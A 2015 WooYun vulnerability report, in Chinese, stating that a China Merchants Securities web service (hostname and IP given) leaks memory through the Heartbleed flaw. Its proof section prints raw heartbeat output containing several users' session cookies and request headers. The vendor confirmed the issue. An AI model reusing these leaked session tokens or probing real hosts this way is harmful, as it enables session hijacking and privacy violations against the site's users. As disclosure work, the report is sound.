当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125067

漏洞标题:招商证券某服务存在心脏滴血漏洞

相关厂商:招商证券股份有限公司

漏洞作者: 路人甲

提交时间:2015-07-07 17:25

修复时间:2015-08-21 18:14

公开时间:2015-08-21 18:14

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

招商证券某服务存在心脏滴血漏洞

详细说明:

ip: 210.21.232.117	
对应域名: kh.newone.com.cn

漏洞证明:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 3902
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.r-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; .NET CLR 2.0.50727)..Host: kh.newone.com.cn..Connection: Keep-Alive..Cookie: PLAY_SESSION=e9e139febb2c06888ddd2c26a86bc656143f7435-%00___ID%3A56cafc67-394d-4623-b850-6bf4e650c7db%00....dR..4..u..<..4%00.zn.+D.~.;.6=108..Cache-Control: max-age=0..Accept-Language: zh-cnZ..pN..i...n.Y.....V.*.W'.B....ie-Match: "1430285244000-91259055"..If-Modified-Since: Wed, 29 Apr 2015 05:27:24 GMT.GF..c.....g...4.{...R...H][email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.ttp://www.lenovomobile.com/admin/module/product/DownFile/Lenovo_P770_UAProfile.xml..X-Requested-With: com.android.browser..User-Agent: Mozilla/5.0 (Linux; U; Android 4.1; zh-cn; Lenovo-P770/S100) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Mobile Safari/534.30..Accept-Encoding: gzip,deflate..Accept-Language: zh-CN, en-US..Accept-Charset: utf-8, utf-16, *;q=0.7..Cookie: PLAY_FLASH=; PLAY_ERRORS=; PLAY_SESSION=a8035aaf0b9650299cc093fac9d7e6c3e334155d-%00___ID%3A0399648f-f2d9-486f-960b-4e7fb80fb170%00....o.jd.U;.Z.U ..3....(
Cookie: PLAY_SESSION=cc47ef06f8903f21bd69e50ae6c0e2fb2a2c8c18-%00___ID%3A3172654b-b83a-4caf-80c8-c973c80e3848%00
Cookie: PLAY_FLASH=; PLAY_ERRORS=; PLAY_SESSION=68be5f56e8cedfdaf1f2df63bced213ed5600ec5-%00___ID%3A84380cdc-7168-4282-92e6-a070b2ad4707%00
Cookie: PLAY_SESSION=2f2823a0e3162f286443c2508290209c5876e36b-%00___ID%3A01fee1cd-1bac-4b97-b38c-2208c50298fa%00
Cookie: CNZZDATA5717826=cnzz_eid%3D436430477-1436229992-https%253A%252F%252Fkh.newone.com.cn%252F%26ntime%3D1436229992; PLAY_SESSION=6d943f5e3541cfc37f7ac3f41dc793adfb0bd842-%00___ID%3A9f02ba4d-486e-408d-968c-2d36123ed093%00

修复方案:

打补丁或者升级到最新版本

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-07 18:12

厂商回复:

谢谢,我们会尽快修复

最新状态:

暂无